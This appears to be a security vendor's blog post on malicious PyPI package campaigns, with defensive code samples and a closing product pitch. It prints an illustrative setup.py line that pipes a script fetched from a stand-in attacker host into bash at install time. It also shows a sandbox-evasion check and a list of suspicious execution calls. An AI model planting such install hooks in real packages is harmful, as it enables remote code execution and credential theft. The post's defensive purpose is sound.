The Python Package Index (PyPI) — the primary repository for Python packages with over 500,000 projects — saw a significant escalation in malicious package campaigns through early 2025. Security researchers from multiple firms identified coordinated upload campaigns targeting Python developers working in data science, machine learning, cloud infrastructure, and cryptocurrency development.
Python's dominance in AI/ML development has made PyPI an increasingly attractive target. When every data scientist and ML engineer runs `pip install` dozens of times a day, the probability that someone installs a malicious package through typosquatting or social engineering scales with that volume.
Scale of the Problem
In the first quarter of 2025:
- Over 500 malicious packages were identified and removed from PyPI
- Multiple coordinated campaigns targeted specific developer communities
- AI/ML-themed packages accounted for approximately 30% of malicious uploads
- Credential theft remained the primary payload objective
- Cloud infrastructure targeting increased significantly, with packages designed to steal AWS, GCP, and Azure credentials
PyPI's volunteer-staffed moderation team, supported by automated scanning, removed packages as quickly as they were identified. But the time between upload and removal (the exposure window) ranged from hours to days, during which unsuspecting developers could download and install the malicious code.
Attack Campaigns
AI/ML typosquatting wave
The explosive growth of Python AI/ML libraries created fertile ground for typosquatting. Packages mimicking popular libraries were uploaded with names like:
- Variants of `transformers`, `pytorch`, `tensorflow`, and `scikit-learn`
- Fake "helper" or "utils" packages for popular AI frameworks
- Packages claiming to provide GPU optimization or model quantization utilities
These targeted a developer demographic that often works in environments with elevated privileges — accessing training data, cloud compute resources, and model repositories. The payloads focused on stealing:
- Hugging Face API tokens
- Cloud provider credentials
- SSH keys used for cluster access
- Weights & Biases and MLflow credentials
Cloud development targeting
Packages designed to intercept cloud infrastructure credentials:
- Typosquats of `boto3` (the AWS SDK), `google-cloud-*` packages, and `azure-*` packages
- Fake infrastructure-as-code helper libraries
- Packages impersonating internal tooling names discovered through GitHub reconnaissance
The payloads exfiltrated credentials and in some cases deployed persistent backdoors that survived beyond the initial Python session.
Cryptocurrency library impersonation
Fake packages targeting cryptocurrency developers:
- Wallet library impersonations that intercepted private keys
- Exchange API wrappers that modified transaction recipients
- DeFi development tools that included key-logging functionality
Given that cryptocurrency transactions are irreversible, these attacks had immediate, unrecoverable financial impact on victims.
Technical Techniques
setup.py exploitation
Python's `setup.py` is executed when a source distribution is installed, which means it can run arbitrary code before the developer ever imports the package. Malicious packages exploit this to fire their payload at install time:

```python
from setuptools import setup
import os

# Executed during `pip install`, before any import of the package:
os.system("curl -s https://attacker.com/payload.sh | bash")

setup(name="legitimate-looking-name", ...)
```
The code runs with the installer's permissions, which in many development environments includes access to cloud credentials, SSH keys, and CI/CD secrets.
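Install-time execution can often be caught statically before installation. The sketch below parses a `setup.py` with Python's `ast` module and flags calls commonly used to run shell commands. It is illustrative, not a production scanner: the `SUSPICIOUS_CALLS` list and the sample source are assumptions for demonstration, and real malware scanners match far more patterns.

```python
import ast

# Calls that indicate code execution at install time. This list is
# illustrative, not exhaustive -- real scanners match many more patterns.
SUSPICIOUS_CALLS = {"os.system", "subprocess.run", "subprocess.Popen",
                    "subprocess.call", "eval", "exec"}

def dotted_name(node):
    """Reconstruct a dotted call name like 'os.system' from an AST node."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = dotted_name(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def flag_install_time_exec(source: str) -> list[str]:
    """Return suspicious call names found anywhere in a setup.py source."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                hits.append(name)
    return hits

# Sample malicious setup.py of the shape shown above:
malicious = '''
from setuptools import setup
import os
os.system("curl -s https://attacker.example/payload.sh | bash")
setup(name="legitimate-looking-name")
'''
print(flag_install_time_exec(malicious))  # ['os.system']
```

A check like this is cheap enough to run on every new dependency before it is ever installed.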
Conditional execution
Sophisticated packages check their environment before executing payloads:
- Detecting CI/CD environments (checking for the `CI`, `GITHUB_ACTIONS`, or `JENKINS_URL` variables)
- Targeting specific operating systems
- Checking for the presence of specific tools or files that indicate high-value targets
- Delaying execution to evade sandbox analysis
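The gating logic typically looks something like the following. This is a reconstruction for illustration, not code from any specific sample; the marker names come from the list above.

```python
import os
import platform

# CI marker variables from the list above; real samples check many more.
CI_MARKERS = ("CI", "GITHUB_ACTIONS", "JENKINS_URL")

def looks_like_analysis_env(env=None) -> bool:
    """The kind of check a payload uses to stay dormant under analysis."""
    env = os.environ if env is None else env
    if any(marker in env for marker in CI_MARKERS):
        return True
    # Some samples only trigger on the operating systems they target.
    return platform.system() not in ("Linux", "Darwin", "Windows")

# A payload gated this way does nothing when a sandbox is suspected,
# so automated analysis sees only benign behavior.
print(looks_like_analysis_env({"GITHUB_ACTIONS": "true"}))  # True
```

Because the malicious branch never executes in a detected sandbox, dynamic analysis alone can miss these packages entirely.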
Steganographic payloads
Some packages embedded malicious code within seemingly legitimate data files — images, model weights, or configuration files included in the package. The setup script would extract and execute the hidden payload, bypassing static analysis that only examines Python source files.
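One defensive counter is to scan a package's data files for embedded executable content, not just its `.py` files. The sketch below flags long base64 runs that decode cleanly; the 200-character threshold and the fake "config" file are illustrative assumptions, not tuned values.

```python
import base64
import re

# Long unbroken base64 runs inside "data" files are a common hiding spot;
# the 200-character threshold is an arbitrary illustration.
B64_RUN = re.compile(rb"[A-Za-z0-9+/=]{200,}")

def find_embedded_blobs(data: bytes) -> list[bytes]:
    """Return decodable base64 runs hidden inside a data file's bytes."""
    blobs = []
    for match in B64_RUN.finditer(data):
        try:
            blobs.append(base64.b64decode(match.group(), validate=True))
        except ValueError:
            continue
    return blobs

# A fabricated "config" file with an embedded payload, for demonstration:
payload = b"import os; os.system('id')" * 10  # long enough to trip the regex
fake_config = b"color=blue\n" + base64.b64encode(payload) + b"\nsize=42\n"
print(len(find_embedded_blobs(fake_config)))  # 1
```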
Dependency chain poisoning
Rather than making the malicious package itself suspicious, some campaigns created chains of packages where:
- Package A appears clean and provides useful functionality
- Package A depends on Package B, which also appears clean
- Package B depends on Package C, which contains the malicious payload
This multi-layer approach makes detection harder because each individual package may not trigger security alerts.
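This is why reviewing only your declared dependencies is insufficient: a scanner has to walk the full transitive tree. A minimal sketch, using hypothetical package names for the A → B → C chain above:

```python
from collections import deque

def transitive_deps(root: str, graph: dict[str, list[str]]) -> set[str]:
    """BFS over a dependency graph: everything installing `root` pulls in."""
    seen, queue = set(), deque([root])
    while queue:
        pkg = queue.popleft()
        for dep in graph.get(pkg, []):
            if dep not in seen:
                seen.add(dep)
                queue.append(dep)
    return seen

# Hypothetical three-layer chain: A depends on B, B depends on C.
graph = {
    "useful-helper-a": ["useful-helper-b"],
    "useful-helper-b": ["payload-carrier-c"],
}
print(transitive_deps("useful-helper-a", graph))
```

Declaring only `useful-helper-a` still pulls `payload-carrier-c` onto your machine, so every node in the set needs the same scrutiny as the root.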
PyPI's Defensive Evolution
PyPI has implemented several security improvements:
- Mandatory 2FA for critical project maintainers
- Trusted Publishers using OpenID Connect for automated publishing from CI/CD
- Malware detection scanning using pattern matching and behavioral analysis
- Rate limiting on new package registrations
- Package provenance through Sigstore integration
These measures have raised the bar for attackers but haven't eliminated the problem. The fundamental challenge is that PyPI is a public repository that accepts uploads from anyone, and the volume of legitimate uploads makes manual review impossible.
Defensive Strategies for Python Developers
Virtual environments always
Never install packages into your system Python. Use virtual environments (venv, conda, poetry) for every project. This limits the blast radius of a malicious package to the project environment rather than your entire system.
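A minimal workflow with the standard-library `venv` module (the requirements file name is a placeholder for your project's own):

```shell
# Create an isolated environment for this project only; a malicious
# package installed here cannot touch the system site-packages.
python3 -m venv .venv
. .venv/bin/activate   # 'source .venv/bin/activate' in bash/zsh

# Installs now land inside .venv rather than the system Python:
# pip install -r requirements.txt
```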
Pin dependencies and use hash verification
Use `pip install --require-hashes` with pinned versions in your requirements files. This ensures that the exact package contents you've reviewed are what gets installed.

```
requests==2.31.0 --hash=sha256:58cd2187c01e70e6e26505bca751777aa9f2ee0b7f4300988b709f44e013003eb
```
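Under the hood, hash-checking mode is a digest comparison on every downloaded artifact. A conceptual sketch of that check (the artifact bytes and pin below are fabricated for illustration):

```python
import hashlib

def matches_pinned_hash(artifact: bytes, pinned: str) -> bool:
    """Compare a downloaded artifact against an 'sha256:<hex>' pin,
    conceptually the check pip performs under --require-hashes."""
    algo, _, expected = pinned.partition(":")
    return hashlib.new(algo, artifact).hexdigest() == expected

# Fabricated artifact and pin, purely for demonstration:
wheel_bytes = b"fake wheel contents"
pin = "sha256:" + hashlib.sha256(wheel_bytes).hexdigest()
print(matches_pinned_hash(wheel_bytes, pin))           # True
print(matches_pinned_hash(b"tampered contents", pin))  # False
```

If an attacker replaces a pinned artifact on the index, the digest no longer matches and the install fails instead of executing the substituted package.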
Audit new dependencies
Before adding a new dependency:
- Check the package's age, download count, and maintainer history
- Review the source code, especially `setup.py` and `__init__.py`
- Check for install-time execution hooks
- Verify the package on PyPI matches what's on GitHub
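Several of these checks can be automated against the PyPI JSON API (`https://pypi.org/pypi/<name>/json`). This sketch inspects already-fetched metadata; the field names follow that API, but the 90-day threshold and the sample record are illustrative assumptions.

```python
from datetime import datetime, timezone

def audit_metadata(meta: dict, min_age_days: int = 90) -> list[str]:
    """Flag red flags in (already fetched) PyPI JSON API metadata.
    Thresholds here are illustrative, not recommendations."""
    warnings = []
    info = meta.get("info", {})
    if not info.get("home_page") and not info.get("project_urls"):
        warnings.append("no homepage or repository link")
    uploads = [
        datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
        for files in meta.get("releases", {}).values()
        for f in files
    ]
    if uploads:
        age = datetime.now(timezone.utc) - min(uploads)
        if age.days < min_age_days:
            warnings.append(f"first upload only {age.days} days ago")
    return warnings

# Fabricated metadata for a brand-new package with no repository link:
sample = {
    "info": {"home_page": "", "project_urls": None},
    "releases": {"0.0.1": [
        {"upload_time_iso_8601": datetime.now(timezone.utc).isoformat()}
    ]},
}
print(audit_metadata(sample))
```

A week-old package with no linked repository is not necessarily malicious, but it deserves a manual source review before it lands in a requirements file.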
Use dependency scanning tools
Integrate automated dependency scanning into your development workflow:
- PyPI advisory database checks
- Commercial tools (Snyk, Socket.dev, Phylum)
- Open source options (pip-audit, safety)
- SBOM generation for all Python projects
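At their core, these tools match your installed package set against an advisory feed. A toy sketch with a hypothetical in-memory advisory list (real tools such as pip-audit query the PyPI Advisory Database and OSV instead):

```python
# Hypothetical advisory data, mapping package name to affected versions.
# Real scanners pull this from the PyPI Advisory Database / OSV feeds.
ADVISORIES = {
    "evil-helper": {"1.0.0", "1.0.1"},
    "totally-safe-utils": {"0.2.0"},
}

def check_installed(installed: dict[str, str]) -> list[str]:
    """Return 'name==version' strings for installed packages with advisories."""
    return [
        f"{name}=={version}"
        for name, version in installed.items()
        if version in ADVISORIES.get(name, set())
    ]

print(check_installed({"requests": "2.31.0", "evil-helper": "1.0.1"}))
# ['evil-helper==1.0.1']
```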
Private package index
For organizations with internal packages, use a private package index (Artifactory, Nexus, devpi) configured as the primary source. This prevents dependency confusion attacks and allows pre-screening of external packages.
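For pip, routing installs through the internal index is a one-line configuration; the index URL below is a placeholder for your organization's own mirror:

```ini
# pip.conf (per-user, or inside each virtual environment)
[global]
index-url = https://pypi.internal.example.com/simple/
```

Because the private index is the sole source, a public package uploaded under an internal name can no longer shadow your in-house dependencies.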
How Safeguard.sh Helps
Safeguard.sh provides comprehensive Python supply chain security through automated SBOM generation and continuous dependency monitoring. The platform tracks every Python package in your projects — direct dependencies and the full transitive tree — and correlates them against known vulnerability databases and malicious package feeds.
When a new malicious PyPI package is identified, Safeguard.sh immediately checks your entire organization's Python dependency trees for exposure. This is critical for large organizations with hundreds of Python projects where manual auditing is impossible.
The platform's policy engine can enforce Python-specific security standards: requiring hash verification, flagging packages with install-time scripts, alerting on new dependencies, and blocking packages that match known malicious patterns. For AI/ML teams working with rapidly evolving dependency stacks, Safeguard.sh provides the automated oversight that prevents supply chain compromises from reaching production.